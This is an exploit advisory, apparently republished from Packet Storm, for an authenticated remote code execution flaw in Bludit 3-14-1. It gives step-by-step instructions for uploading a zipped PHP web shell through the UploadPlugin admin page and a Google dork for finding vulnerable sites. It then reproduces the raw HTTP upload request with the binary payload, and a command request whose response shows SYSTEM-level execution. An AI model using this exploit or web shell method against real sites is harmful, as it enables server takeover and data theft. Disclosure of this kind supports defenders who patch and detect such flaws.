Headline

Bludit 3-14-1 Shell Upload

Bludit version 3-14-1 suffers from a remote shell upload vulnerability.

1 year ago

#csrf #vulnerability #web #windows #google #linux #apache #php #rce #auth #firefox

# Exploit Title: Bludit 3-14-1 Plugin 'UploadPlugin' - Remote Code Execution (RCE) (Authenticated)# Exploit Author: Alperen Ergel# Contact: @alpernae (IG/TW)# Software Homepage: https://www.bludit.com/# Version : 3-14-1# Tested on: windows 11 wampserver | Kali linux# Category: WebApp# Google Dork: intext:'2022 Powered by Bludit'# Date: 8.12.2022######## Description ##########  Step 1 : Archive as a zip your webshell (example: payload.zip)#  Step 2 : Login admin account and download 'UploadPlugin'#  Step 3 : Go to UploadPlugin section#  Step 4 : Upload your zip#  Step 5 : target/bl-plugins/[your_payload]######### Proof of Concept ########==============> START REQUEST <========================================POST /admin/plugin/uploadplugin HTTP/2Host: localhostCookie: BLUDIT-KEY=ri91q86hhp7mia1o8lrth63kc4User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateContent-Type: multipart/form-data; boundary=---------------------------308003478615795926433430552264Content-Length: 1820Origin: https://036e-88-235-222-210.eu.ngrok.ioDnt: 1Referer: https://036e-88-235-222-210.eu.ngrok.io/admin/plugin/uploadpluginUpgrade-Insecure-Requests: 1Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: same-originSec-Fetch-User: ?1Te: trailers-----------------------------308003478615795926433430552264Content-Disposition: form-data; name="tokenCSRF"b6487f985b68f2ac2c2d79b4428dda44696d6231-----------------------------308003478615795926433430552264Content-Disposition: form-data; name="pluginorthemes"plugins-----------------------------308003478615795926433430552264Content-Disposition: form-data; name="zip_file"; filename="a.zip"Content-Type: application/zipPK    †eˆU               a/PK   ”fˆUÆ  ª)¢  Ä      a/a.phpíVÛŽÓ0}ç+La BÛìVÜ–pX®ËJ @Vêº!µƒíÒrûwl7É$mQyà‘<$©çÌÌ93ã¸È]ƒË·ï–óÒ=/.&nbsp;pÝãZ+M5/•¶BÎÈ0>©M†[jÅ‚ÓB,„õtOÌ¤Òœ.×4;’†e)¨ƒ¼È×”¯9[Z¡dðÆ  „Œ&Âd<ó`÷+œN—’y¼ÁRLÉE¾(í7â}âø‡_‡¥æ3OºÈ'xð>A¯p‚pânÁã¤ëÀ×e¡&œük£‹¼$Øj±ØFýâ…á@\@ªgxD¢Ì'áôæQ?½v£ŸöG7ñùZgéññõ“j±u\õ„±†à/ï¾ÎÞž´×T™HÄZu™jœHkª‰È£û§gÑÅ,CÆêRâVjÅ5yùø%}q»ú„Ä(ŽQK*Ë"Öï¡£;—Ò²·6z²ZŸgXÊò¢ðíÄ'éûù+ñÌ%µj,ÐäàN°ùf,_à8—“‹•[³˜lO€ScsmI«‡¬«H»¯*Sc?i”)i¹´&x@.'”<—¤Ûç]zs^a®·)‚hBz0;f rì‰þÇ¸0yÕU¥H"ÕÕÿI  IØ\“t{có~€J©£ªä²Ë Ö÷š;dÁ³âÙlh†»s%Ç  Ö8Nº+«}+ŽÿaºržŸŸžÂÂj.îvWS²A¿O?nHO?›jžO ¤Ã£Q+ì¯æí^ Ïe8©ô*Ô¾"ý¡@Ó2+ëÂ`÷kC57j©'Î"m ã®ho¹ xŸô Û;’œcçzÙQË·[kô¿Ý¯-2ì~¨“æv©¥C€î‘Tþ#k2,UØSŽ¦€OÁS£Øg˜‚úK †QˆÜ  ØIÏ²òÖ`Ð:%F½$A"t;buOMr4Ýè~–eãÎ™åØXíÇm˜Ç(s 6A¸3,l>º…<N®¦q{s __~tÂ6á¾,…ÅèçO´ÇÆ×Î£v²±ãÿbÃ‘Ú’‘Ug[;pq›eÓÜÅØÿéJË}êv‚3ð8´# ŠOµsÈO«ýbƒh±ï°Ÿd—Ë…¹ÿˆ>yþðMröâÁSzöæõÃûÏÜû)}óàeºqQRrf}êê_D Ø0ìu’õv'§öø?@‡ êûOæh'˜Oœ8f—D¼5[à²=b~PK?    †eˆU             $       €íA    a/          þš®,Ù þš®,Ù€ø¨j.ÙPK?   ”fˆUÆ  ª)¢  Ä    $        €¤    a/a.php          ¤eÝ-Ù ÷C-Ù bj.ÙPK         ç    -----------------------------308003478615795926433430552264Content-Disposition: form-data; name="submit"Upload-----------------------------308003478615795926433430552264--==============> END REQUEST <========================================## WEB SHELL UPLOADED!==============> START RESPONSE <========================================HTTP/2 200 OKCache-Control: no-store, no-cache, must-revalidateContent-Type: text/html; charset=UTF-8Date: Thu, 08 Dec 2022 18:01:43 GMTExpires: Thu, 19 Nov 1981 08:52:00 GMTNgrok-Trace-Id: f3a92cc45b7ab0ae86e98157bb026ab4Pragma: no-cacheServer: Apache/2.4.51 (Win64) PHP/7.4.26X-Powered-By: Bludit....==============> END RESPONSE <========================================# REQUEST THE WEB SHELL==============> START REQUEST <========================================GET /bl-plugins/a/a.php?cmd=whoami HTTP/2Host: localhostCookie: BLUDIT-KEY=ri91q86hhp7mia1o8lrth63kc4User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateDnt: 1Upgrade-Insecure-Requests: 1Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: noneSec-Fetch-User: ?1Te: trailers==============> END REQUEST <======================================================> START RESPONSE <========================================HTTP/2 200 OKContent-Type: text/html; charset=UTF-8Date: Thu, 08 Dec 2022 18:13:14 GMTNgrok-Trace-Id: 30639fc66dcf46ebe29cc45cf1bf3919Server: Apache/2.4.51 (Win64) PHP/7.4.26X-Powered-By: PHP/7.4.26Content-Length: 32<pre>nt authority\system</pre>==============> END RESPONSE <========================================

Packet Storm: Latest News

ABB Cylon Aspect 3.08.01 vstatConfigurationDownload.php Configuration Download

1 day ago

Packet Storm

Akuvox Smart Intercom/Doorphone ServicesHTTPAPI Improper Access Control

1 day ago

Packet Storm

Debian Security Advisory 5819-1

1 day ago

Packet Storm

Ubuntu Security Notice USN-7126-1

1 day ago

Packet Storm

Ubuntu Security Notice USN-7127-1

1 day ago

Packet Storm